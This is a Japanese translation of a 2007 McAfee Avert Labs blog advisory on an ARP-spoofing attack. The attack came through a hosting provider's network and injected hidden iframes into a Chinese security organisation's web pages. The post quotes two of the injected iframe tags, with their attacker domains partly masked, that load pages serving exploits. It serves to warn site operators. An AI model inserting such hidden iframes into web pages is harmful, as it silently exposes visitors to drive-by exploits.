「ARP Spoofing: Is Your Web Hosting Service Protected ?」より
October 4, 2007 Posted by Geok Meng Ong
当ブログではこの2カ月間で,公衆/商用Webホスティング・サービスがどうやってマルウエアのホスティングやエクスプロイト,スパム送信に悪用されるかを数回話題にした。
10月第1週は中国の“ゴールデン・ウィーク”にあたることから,ハッカーたちはサーバー管理者の油断につけ込むよい機会であると考えた。中国のセキュリティ組織であるChinese Internet Security Response Team(C.I.S.R.T.)は公式ブログで10月2日,同組織が管理している複数のWebページに悪意のあるIFRAMEタグが挿入されたと発表した(関連記事:中国セキュリティ組織のWebサイトにわな、ウイルス感染の恐れ)。McAfee Avert LabsはすぐC.I.S.R.T.の研究者に連絡を取り,タグ挿入の影響と侵入方法を調査した。
C.I.S.R.T.の自主調査によると,同組織の利用しているWebホスティング・サービス・プロバイダのネットワークからARPポイズニング攻撃を仕掛けられたという。そして,やはり同組織のWeb担当技術者は1週間の休暇を取っていた。
ARPポイズニングはman-in-the-middle(仲介者)攻撃の一種で,ゲートウエイとWebサーバー間の通信に悪意のあるコードを挿入する。C.I.S.R.T.のWebサイトの場合,複数のWebページに以下のIFRAMEタグによるリンクが挿入されていた。
<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>
我々が調査したところ,改変されたWebページには難読化済みエクスプロイトが挿入されており,Exploit-MS06-014とExploit-BaoFeng.aという,少なくとも2件のセキュリティ・ホールを攻撃対象としていた。両セキュリティ・ホールは,既に修正パッチが公開されている。またExploit-BaoFeng.aは,中国で人気のあるメディア・プレーヤに関係するセキュリティ・ホールだ。このWebホスティング・サービス・プロバイダの管理下にあるほかの仮想ホストをざっと調べたら,以下に示す悪質なリンクが挿入されたWebサイトの存在を確認できた。
<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>
ARPポイズニングは古い手口であるものの,仮想ドメイン・ホスティング環境で悪用されると,現在も致命的な被害を及ぼしかねない。というのも,1台のゲートウエイからHTool-MPack攻撃と同じように多くのWebサイトに感染することが可能となり,膨大なWebサイトに影響を与えられるのだ。McAfee Avert Labsの研究者であるZhu Cheng氏は自身のブログで,Webページへのコード挿入をARPスプーフィングで実行する手口について解説した。NetSniffなどのトロイの木馬ツール・キットはこうした機能を搭載しており,簡単に攻撃が行える。ただし通信が“雑音”で乱されるので,スプーフィング済みARPパケットは通信経路上で簡単に検出できる。
読者も運用中のWebサイトについてセキュリティを検査し,契約しているWebホスティング・サービス・プロバイダと話し合うとよいだろう。
Copyrights (C) 2007 McAfee, Inc. All rights reserved.
本記事の内容執筆時点のものであり,含まれている情報やリンクの正確性,完全性,妥当性について保証するものではありません。
◆この記事は,マカフィーの許可を得て,米国のセキュリティ・ラボであるMcAfee Avert Labsの研究員が執筆するブログMcAfee Avert Labs Blogの記事を抜粋して日本語化したものです。
オリジナルの記事は,「ARP Spoofing: Is Your Web Hosting Service Protected ?」と「Click-fraud, captchas & session-fixation puzzles」でお読みいただけます。
